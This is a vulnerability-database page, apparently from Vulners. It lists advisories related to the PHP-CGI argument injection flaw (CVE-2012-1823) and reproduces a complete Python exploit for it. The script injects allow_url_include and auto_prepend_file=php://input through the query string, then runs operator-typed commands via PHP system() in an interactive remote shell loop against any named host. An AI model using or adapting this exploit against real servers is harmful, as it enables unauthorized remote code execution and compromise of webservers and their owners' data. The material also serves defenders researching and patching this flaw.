PHP-CGI Argument Injection Remote Code Execution Python Exploit for CVE-2012-182
Reporter | Title | Published | Views | Family All 199 |
---|---|---|---|---|
![]() | Apache + PHP 5.x Remote Code Execution Python Exploit #2 | 31 Oct 201300:00 | β | packetstorm |
![]() | PHP-CGI Argument Injection Remote Code Execution | 24 Dec 201200:00 | β | packetstorm |
![]() | PHP CGI Argument Injection | 22 May 201200:00 | β | packetstorm |
![]() | PHP CGI Argument Injection | 6 May 201200:00 | β | packetstorm |
![]() | Apache / PHP Remote Command Execution | 29 Oct 201300:00 | β | packetstorm |
![]() | PHP CGI Injection | 6 May 201200:00 | β | packetstorm |
![]() | CVE-2012-1823 | 11 May 201200:00 | β | attackerkb |
![]() | CVE-2013-4878 | 18 Jul 201300:00 | β | attackerkb |
![]() | PHP-CGI Query String Parameter Vulnerability | 25 Mar 202200:00 | β | cisa_kev |
![]() | PHP-CGI OS Command Injection Vulnerability | 12 Jun 202400:00 | β | cisa_kev |
#!/usr/bin/python
import requests
import sys
print """
CVE-2012-1823 PHP-CGI Arguement Injection Remote Code Execution
This exploit abuses an arguement injection in the PHP-CGI wrapper
to execute code as the PHP user/webserver user.
Feel free to give me abuse about this <3
- infodox | insecurety.net | @info_dox
"""
if len(sys.argv) != 2:
print "Usage: ./cve-2012-1823.py <target>"
sys.exit(0)
target = sys.argv[1]
url = """http://""" + target + """/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"""
lol = """<?php system('"""
lol2 = """');die(); ?>"""
print "[+] Connecting and spawning a shell..."
while True:
try:
bobcat = raw_input("%s:~$ " %(target))
lulz = lol + bobcat + lol2
hax = requests.post(url, lulz)
print hax.text
except KeyboardInterrupt:
print "\n[-] Quitting"
sys.exit(1)
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo